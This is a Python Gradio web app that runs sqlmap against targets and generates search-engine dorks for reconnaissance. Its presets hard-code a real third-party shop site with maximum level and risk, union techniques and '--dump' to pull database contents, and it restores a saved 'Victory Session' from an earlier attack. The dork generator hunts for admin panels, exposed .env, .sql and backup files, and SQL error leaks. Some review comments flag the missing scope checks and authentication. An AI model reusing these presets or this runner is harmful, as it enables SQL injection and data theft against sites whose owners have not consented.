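import gradio as gr
import subprocess
import os
import shutil
from pathlib import Path


# --- Session Restoration Logic ---
def restore_session():
    """Copy a local ``session.sqlite`` into sqlmap's per-host output folders.

    The file is looked up relative to the current working directory and, when
    present, copied into both the bare-host and the ``www.`` output directory.

    Returns:
        A one-line status string for the UI log: success, a warning carrying
        the exception text, or a notice that no session file exists.
    """
    # SQLMap in Docker uses /root/.local/share/sqlmap/output/
    session_source = "session.sqlite"
    target_base = Path("/root/.local/share/sqlmap/output/hashi.ae")
    # Also try the www. variant
    target_www = Path("/root/.local/share/sqlmap/output/www.hashi.ae")

    if not os.path.exists(session_source):
        return "ℹ️ No session file found in repository."

    # NOTE(review): the file is copied with no integrity or provenance check,
    # so whatever is committed as session.sqlite becomes sqlmap's cached state
    # for these hosts. Treat it as untrusted input to the scanner.
    try:
        for target_dir in (target_base, target_www):
            target_dir.mkdir(parents=True, exist_ok=True)
            shutil.copy(session_source, target_dir / "session.sqlite")
    except Exception as e:
        # Best effort: a failed restore must not prevent the run.
        return f"⚠️ Session restore warning: {e}"
    return f"✅ Victory Session Injected into {target_base}"


def run_sqlmap(url, threads, level, risk, tamper, techn, proxy, extra_args):
    """Run sqlmap as a child process and stream its combined output.

    This is a generator: each yielded value is the full text to display so
    far, so the UI component is overwritten rather than appended to.

    Args:
        url: Target URL passed to ``-u``; an empty value aborts the run.
        threads, level, risk: Numeric values, coerced with ``int()``.
        tamper, techn, proxy: Optional strings; each is forwarded only when
            non-empty.
        extra_args: Optional free-form string, split on whitespace and
            appended to the command line.

    Yields:
        The session-restore status plus the command line, then the growing
        log, then a final line reporting the exit status or a fatal error.
    """
    # Restore session first
    session_status = restore_session()

    if not url:
        yield f"{session_status}\n❌ Error: Target URL is required."
        return

    # Base command
    cmd = ["python3", "/app/sqlmap-dev/sqlmap.py", "-u", url, "--batch"]

    # Performance & Level
    cmd += ["--threads", str(int(threads))]
    cmd += ["--level", str(int(level))]
    cmd += ["--risk", str(int(risk))]

    # Specific options
    if tamper:
        cmd += ["--tamper", tamper]
    if techn:
        cmd += ["--technique", techn]
    if proxy:
        cmd += ["--proxy", proxy]
    if extra_args:
        # NOTE(review): no allowlist is applied here. The argv list avoids a
        # shell, but any sqlmap option can still be supplied from the web
        # form, and the form is served without authentication (see launch()).
        # Restrict this to a vetted set of options before exposing the app.
        cmd += extra_args.split()

    yield f"{session_status}\n🚀 Launching SQLMAP Cloud Runner...\n🛰️ Command: {' '.join(cmd)}\n\n"

    process = None
    full_log = ""
    try:
        process = subprocess.Popen(
            cmd,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            text=True,
            # Undecodable bytes in scanner output must not abort the stream.
            errors="replace",
            bufsize=1,
        )

        for line in process.stdout:
            full_log += line
            yield full_log

        process.wait()
        if process.returncode == 0:
            yield full_log + "\n✅ Scan completed successfully."
        else:
            yield full_log + f"\n⚠️ Scan stopped with return code {process.returncode}."
    except Exception as e:
        # Keep what was already streamed instead of replacing it with the error.
        fatal = f"❌ Fatal Error: {e}"
        yield f"{full_log}\n{fatal}" if full_log else fatal
    finally:
        # Runs on normal completion, on error, and when the generator is
        # closed early (cancelled event or dropped client): the child must not
        # keep sending traffic after the UI has stopped listening.
        if process is not None:
            if process.poll() is None:
                process.kill()
                process.wait()
            if process.stdout is not None:
                process.stdout.close()


# Pre-filled shortcuts
# NOTE(review): the presets hard-code a third-party host and the runner has no
# scope/allowlist check on the target. Load targets from engagement
# configuration rather than from source.
def set_hashi_victory():
    """Return preset form values in the order url, threads, level, risk,
    tamper, technique, proxy, extra arguments."""
    return (
        "https://hashi.ae/shop/page/4/?add-to-cart=638",
        10,
        5,
        3,
        "",
        "U",
        "",
        "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast",
    )


def set_search_attack():
    """Return preset form values (same field order as ``set_hashi_victory``)."""
    return (
        "https://hashi.ae/?s=iphone",
        10,
        5,
        3,
        "space2comment",
        "BEU",
        "",
        "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast",
    )


def set_mysql_attack():
    """Return preset form values (same field order as ``set_hashi_victory``)."""
    return (
        "https://hashi.ae/?s=iphone",
        10,
        5,
        3,
        "space2comment",
        "BEU",
        "",
        "--dbms=MySQL --dump --force-ssl --random-agent --no-cast",
    )


# --- Dork Studio Logic ---
def generate_dorks(domain, targeted_extensions, find_admin, find_files, find_errors):
    """Build a newline-separated list of labelled search-engine queries.

    Args:
        domain: Optional domain; when given, every query is prefixed with
            ``site:<domain>``.
        targeted_extensions: Optional comma-separated extensions added to the
            built-in list; blank entries are ignored.
        find_admin, find_files, find_errors: Toggles for each query family.

    Returns:
        The queries joined with newlines (empty string when all toggles are
        off).
    """
    dorks = []
    base = f"site:{domain}" if domain else ""

    if find_admin:
        keywords = ["admin", "login", "dashboard", "portal", "cpanel", "wp-admin"]
        dorks.extend(f"Admin Search: {base} inurl:{k}" for k in keywords)

    if find_files:
        exts = ["env", "log", "sql", "bak", "txt", "config"]
        if targeted_extensions:
            exts += targeted_extensions.split(",")
        for raw_ext in exts:
            ext = raw_ext.strip()
            if ext:
                dorks.append(f"File Exposure ({ext}): {base} ext:{ext}")
        dorks.append(f"{base} intitle:\"index of\"")

    if find_errors:
        errors = ["SQL syntax", "warning: mysql_", "unclosed quotation mark", "syntax error"]
        dorks.extend(f"Error Leak: {base} intext:\"{err}\"" for err in errors)

    return "\n".join(dorks)


with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")) as demo:
    gr.Markdown("# 🌊 SLMP Cloud Runner v2.0 - Ultra Speed 🌩️")
    gr.Markdown("Deploy SQLMAP in the cloud for maximum bandwidth. Now includes Alpha Recon Studio.")

    with gr.Tabs():
        # TAB 1: ATTACK RUNNER
        with gr.TabItem("⚔️ Attack Runner"):
            with gr.Row():
                with gr.Column(scale=2):
                    url_input = gr.Textbox(label="🎯 Target URL", placeholder="https://example.com/page.php?id=1")

                    with gr.Tabs():
                        with gr.TabItem("🚀 Performance"):
                            with gr.Row():
                                threads_input = gr.Slider(minimum=1, maximum=10, step=1, value=10, label="Threads")
                                level_input = gr.Slider(minimum=1, maximum=5, step=1, value=5, label="Level")
                                risk_input = gr.Slider(minimum=1, maximum=3, step=1, value=3, label="Risk")

                        with gr.TabItem("🛡️ Advanced"):
                            tamper_input = gr.Textbox(label="🧪 Tampers", placeholder="space2comment,randomcase")
                            techn_input = gr.Textbox(label="📡 Technique", placeholder="U (UNION), B (Blind), etc.")
                            proxy_input = gr.Textbox(label="🔌 Proxy (Optional)", placeholder="http://127.0.0.1:8080")
                            extra_input = gr.Textbox(label="⚙️ Extra Arguments", placeholder="--dbms=Oracle --dump --batch")

                    with gr.Row():
                        btn_run = gr.Button("🔥 START SCAN", variant="primary")

                    with gr.Row():
                        btn_hashi = gr.Button("🏰 Hashi Victory", variant="secondary")
                        btn_search = gr.Button("🔍 Search (Oracle)", variant="stop")
                        btn_mysql = gr.Button("🐬 Search (MySQL - Plan D)", variant="secondary")
                        btn_stop = gr.Button("🛑 STOP", variant="stop")

                with gr.Column(scale=3):
                    output_log = gr.Code(label="📊 LIVE CLOUD LOGS", language="markdown", interactive=False, lines=30)

        # TAB 2: RECON STUDIO (Merged)
        with gr.TabItem("🦅 Alpha Recon Studio"):
            with gr.Row():
                with gr.Column():
                    domain_input = gr.Textbox(label="Target Domain", placeholder="example.com")
                    ext_input = gr.Textbox(label="Custom Extensions", placeholder="jsp, php, asp")
                    with gr.Group():
                        check_admin = gr.Checkbox(label="Find Admin Panels", value=True)
                        check_files = gr.Checkbox(label="Find Sensitive Files", value=True)
                        check_errors = gr.Checkbox(label="Find SQL Errors", value=True)
                    btn_gen = gr.Button("🔍 Generate Recon Dorks", variant="primary")

                with gr.Column():
                    dork_output = gr.Code(label="Generated Dorks", language="text", lines=20)

    # The runner form fields, in the positional order run_sqlmap() and the
    # preset functions use.
    runner_fields = [
        url_input,
        threads_input,
        level_input,
        risk_input,
        tamper_input,
        techn_input,
        proxy_input,
        extra_input,
    ]

    # Event handlers Runner
    run_event = btn_run.click(run_sqlmap, inputs=runner_fields, outputs=output_log, queue=True)
    btn_hashi.click(set_hashi_victory, outputs=runner_fields)
    btn_search.click(set_search_attack, outputs=runner_fields)
    btn_mysql.click(set_mysql_attack, outputs=runner_fields)
    # The STOP button previously had no handler, so a running scan could not
    # be halted from the UI. Cancelling the run event should close the
    # generator, whose finally block kills the child process.
    # NOTE(review): confirm on the deployed Gradio version that cancellation
    # takes effect while the generator is blocked reading the child's stdout.
    btn_stop.click(fn=None, inputs=None, outputs=None, cancels=[run_event])

    # Event handlers Recon
    btn_gen.click(
        generate_dorks,
        inputs=[domain_input, ext_input, check_admin, check_files, check_errors],
        outputs=dork_output,
    )

if __name__ == "__main__":
    print("✨ SLMP Panel Live.")
    # NOTE(review): bound to all interfaces with no auth= passed to launch(),
    # so anyone who can reach port 7860 can start the subprocess above with
    # free-form arguments. Bind to loopback or require credentials before
    # deploying.
    demo.queue().launch(server_name="0.0.0.0", server_port=7860)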